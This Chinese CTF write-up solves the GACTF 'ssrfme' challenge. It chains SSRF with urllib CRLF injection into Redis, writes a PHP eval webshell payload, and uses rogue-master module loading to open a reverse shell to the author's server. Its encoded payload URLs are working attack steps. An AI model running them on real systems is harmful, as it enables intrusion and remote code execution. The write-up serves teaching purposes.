GACTF之ssrfme

2020年9月23日11:55:06评论445 views字数 2311阅读7分42秒阅读模式

点击蓝字 · 关注我们

绕过url解析

http://121.36.199.21:10802/?url=http://root:root@127.0.0.1:[email protected]/&rid=2&pid=1&title=

爆破内部端口

GACTF之ssrfme

存在注入

发现第二个web是urllib 对应版本存在CRLF注入

http://121.36.199.21:10802/?url=http://root:[email protected]:[email protected]/?url=http://123.56.22.0:999

GACTF之ssrfme

爆破

爆破发现存在redis端口 6379，但是密码怎么都不对，结合题目说的提示推测可能是安全机制。

http://121.36.199.21:10802/?url=http://root:[email protected]:[email protected]/?url=http://123.56.22.0:6378?%250D%250Aauth%2520123123%250D%250Ainfo%250D%250A1

服务器搭建测试直接提交有安全机制

GACTF之ssrfme

但是如果发送

http://121.36.199.21:10802/?url=http://root:[email protected]:[email protected]/?url=http://123.56.22.0:6378?%250D%250Aauth%2520123123%250D%250Aset%2520A%2520evil%250D%250A

服务器无回显但是A已经被设置为evil了所以就不用管先搞密码

爆破redis密码我是用的主从来做的，当密码正确会连接到我的vps

http://121.36.199.21:10802/?url=http://root:[email protected]:[email protected]/?url=http://123.56.22.0:6377?%250D%250Aauth%2520123123%250D%250Aslaveof%2520123.56.22.0%25202323%250D%250A1

redis密码123456

GACTF之ssrfme

shell 失败尝试主从rce

写shell失败可能是无权限就不考虑计划任务了

http://121.36.199.21:10802/?url=http://root:[email protected]:[email protected]/?url=http://123.56.22.0:6377?%250D%250Aauth%2520123123%250D%250Aset%2520A%2520%2520%253C%253Fphp%253b%2540eval%2528%2524_POST%255Bc%255D%2529%253B%253F%253E%250A%250D%250A%250D%250A%250d%250aconfig%2520set%2520dir%2520/tmp%250d%250aconfig%2520set%2520dbfilename%2520suanve.php%250d%250asave%250d%250apadding

尝试主从rce

参考https://blog.csdn.net/weixin_43610673/article/details/106457180

使用工具

https://github.com/xmsec/redis-ssrf

执行脚本不停的监听

while [ "1" = "1" ]do        python rogue-server.pydone

三次请求&反弹拿flag

准备好以后nc监听6663端口依次发送三次请求

0x01 设置tmp目录

http://121.36.199.21:10804/?url=http://root:root@127.0.0.1:5000@baidu.com/?url=http://127.0.0.1:6379?%250D%250Aauth%2520123456%250d%250aconfig%2520set%2520dir%2520%252ftmp%250d%250a1

0x02 设置exp.so

http://121.36.199.21:10804/?url=http://root:root@127.0.0.1:5000@baidu.com/?url=http://127.0.0.1:6379?%250D%250Aauth%2520123456%250d%250aconfig%2520set%2520dbfilename%2520exp.so%250d%250aslaveof%2520123.56.22.0%25206666%250d%250aquit%250a1

0x03 加载so后执行反弹命令

http://121.36.199.21:10804/?url=http://root:root@127.0.0.1:5000@baidu.com/?url=http://127.0.0.1:6379?%250D%250Aauth%2520123456%250d%250amodule%2520load%2520%252ftmp%252fexp.so%250d%250asystem.rev%2520123.56.22.0%25206663%250d%250aquit%250d%250a1

服务器收到三次请求

GACTF之ssrfme

反弹拿到shell

GACTF之ssrfme

GACTF{to0_t0o_easy_SSRF101_1ace2020}

EDI安全

扫二维码｜关注我们

一个专注渗透实战经验分享的公众号

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

GACTF之ssrfme

如何优雅的杀敌以做到英雄无敌?记一次血战上海滩修改器制作过程

第四届商师校赛-web（ak）

逆向分析：Win10 ObRegisterCallbacks的相关分析

网络化船舶自主航行系统安全技术研究进展

【buuctf】[极客大挑战]PHP

【技术干货】NetStumbler无线网络探测全攻略：从入门到实战

网络安全标准实践指南—— 一键停止收集车外数据指引（v1.0-202412）

硬件黑客：从报废路由器里挖宝，聊聊PCB逆向那点事儿

Android 内核历险记：深入了解编译、定制和应用程序分析

懒人一键搭建符号执行环境V5k3

发表评论

在线咨询

微信